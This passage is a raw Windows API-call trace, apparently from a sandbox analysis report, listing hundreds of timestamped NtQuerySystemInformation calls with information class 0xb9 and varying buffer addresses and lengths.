ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x28, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x38, ResultLength=0x0) [0229.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x20, ResultLength=0x0) [0229.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0229.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.398] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x38, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd378, Length=0x58, ResultLength=0x0) [0229.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.427] NtQuerySystemInformation (SystemInformationClass=0xb9, 